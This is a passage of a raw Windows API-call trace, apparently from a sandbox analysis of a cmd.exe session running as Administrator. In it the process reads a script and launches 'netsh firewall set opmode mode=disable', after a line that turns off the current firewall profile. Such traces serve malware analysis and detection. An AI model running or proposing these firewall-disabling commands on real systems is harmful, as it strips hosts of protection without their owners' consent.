lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr=" ll set currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr="sl set currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="e set currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="tset currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr=" et currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="ot currentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.867] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="p currentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.867] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="mcurrentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.867] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr="ourrentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.867] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr="drrentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.867] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="erentprofile state off\n") returned 1 [0173.867] _get_osfhandle (_FileHandle=0) returned 0xac [0173.867] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.867] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr=" entprofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="mntprofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="otprofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr="dprofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35a, cchWideChar=1 | out: lpWideCharStr="erofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.868] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35c, cchWideChar=1 | out: lpWideCharStr="=ofile state off\n") returned 1 [0173.868] _get_osfhandle (_FileHandle=0) returned 0xac [0173.868] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.868] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35e, cchWideChar=1 | out: lpWideCharStr="dfile state off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e360, cchWideChar=1 | out: lpWideCharStr="iile state off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e362, cchWideChar=1 | out: lpWideCharStr="sle state off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e364, cchWideChar=1 | out: lpWideCharStr="ae state off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e366, cchWideChar=1 | out: lpWideCharStr="b state off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e368, cchWideChar=1 | out: lpWideCharStr="lstate off\n") returned 1 [0173.869] _get_osfhandle (_FileHandle=0) returned 0xac [0173.869] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.869] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.869] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36a, cchWideChar=1 | out: lpWideCharStr="etate off\n") returned 1 [0173.870] _get_osfhandle (_FileHandle=0) returned 0xac [0173.870] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.870] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.870] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36c, cchWideChar=1 | out: lpWideCharStr="\nate off\n") returned 1 [0173.870] _get_osfhandle (_FileHandle=0) returned 0xac [0173.870] GetFileType (hFile=0xac) returned 0x3 [0173.870] _get_osfhandle (_FileHandle=0) returned 0xac [0173.870] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.870] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.870] GetFileType (hFile=0xb8) returned 0x3 [0173.870] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh firewall set opmode mode=disable\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh firewall set opmode mode=disable\n", lpUsedDefaultChar=0x0) returned 40 [0173.870] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x20f8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f8b8*=0x27, lpOverlapped=0x0) returned 1 [0173.870] GetProcessHeap () returned 0x2e0000 [0173.870] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2ffe70 [0173.870] GetProcessHeap () returned 0x2e0000 [0173.870] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ffe70 | out: hHeap=0x2e0000) returned 1 [0173.871] GetProcessHeap () returned 0x2e0000 [0173.871] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0173.871] GetProcessHeap () returned 0x2e0000 [0173.871] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1c) returned 0x2f4610 [0173.871] GetProcessHeap () returned 0x2e0000 [0173.871] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x54) returned 0x2f9880 [0173.871] GetConsoleOutputCP () returned 0x1b5 [0173.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0173.871] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0173.872] GetConsoleTitleW (in: lpConsoleTitle=0x20f870, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x60) returned 0x2f99d0 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2e1320 [0173.872] SetErrorMode (uMode=0x0) returned 0x0 [0173.872] SetErrorMode (uMode=0x1) returned 0x0 [0173.872] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1330, lpFilePart=0x20f100 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f100*="system32") returned 0x13 [0173.872] SetErrorMode (uMode=0x0) returned 0x1 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1320, Size=0x44) returned 0x2e1320 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1320) returned 0x44 [0173.872] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.872] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2f5b70 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9be0 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9be0, Size=0x106) returned 0x2f9be0 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9be0) returned 0x106 [0173.872] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.872] GetProcessHeap () returned 0x2e0000 [0173.872] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 0x2f9d00 [0173.873] GetProcessHeap () returned 0x2e0000 [0173.873] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9d00, Size=0x7e) returned 0x2f9d00 [0173.873] GetProcessHeap () returned 0x2e0000 [0173.873] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9d00) returned 0x7e [0173.873] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0x2ffea0 [0173.873] FindClose (in: hFindFile=0x2ffea0 | out: hFindFile=0x2ffea0) returned 1 [0173.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0xffffffffffffffff [0173.873] GetLastError () returned 0x2 [0173.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0x2ffea0 [0173.873] FindClose (in: hFindFile=0x2ffea0 | out: hFindFile=0x2ffea0) returned 1 [0173.873] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0173.873] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0173.873] GetConsoleTitleW (in: lpConsoleTitle=0x20f3c0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0173.873] GetProcessHeap () returned 0x2e0000 [0173.873] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2e1380 [0173.873] GetConsoleTitleW (in: lpConsoleTitle=0x2e1390, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0173.874] GetProcessHeap () returned 0x2e0000 [0173.874] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2e1380, Size=0xc6) returned 0x2e1380 [0173.874] GetProcessHeap () returned 0x2e0000 [0173.874] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2e1380) returned 0xc6 [0173.874] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - netsh firewall set opmode mode=disable") returned 1 [0173.874] GetProcessHeap () returned 0x2e0000 [0173.874] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1380 | out: hHeap=0x2e0000) returned 1 [0173.874] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f178, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f138 | out: lpAttributeList=0x20f178, lpSize=0x20f138) returned 1 [0173.874] UpdateProcThreadAttribute (in: lpAttributeList=0x20f178, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f128, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f178, lpPreviousValue=0x0) returned 1 [0173.874] GetStartupInfoW (in: lpStartupInfo=0x20f290 | out: lpStartupInfo=0x20f290*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xac, hStdOutput=0xb8, hStdError=0xb8)) [0173.874] GetProcessHeap () returned 0x2e0000 [0173.874] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.874] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.875] _wcsnicmp 